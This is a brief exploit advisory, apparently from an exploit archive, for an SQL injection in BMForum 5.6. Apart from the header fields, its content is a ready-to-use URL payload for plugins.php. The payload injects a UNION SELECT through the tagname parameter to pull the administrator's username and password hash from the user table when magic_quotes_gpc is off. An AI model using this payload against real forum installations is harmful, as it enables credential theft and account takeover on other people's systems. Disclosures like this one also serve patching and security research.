Author: ~!Dok_tOR!~ Date found: 30.09.08 Product: BMForum Version: 5.6 URL: www.bmforum.com Vulnerability Class: SQL Injection Condition: magic_quotes_gpc = Off Exploit: http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*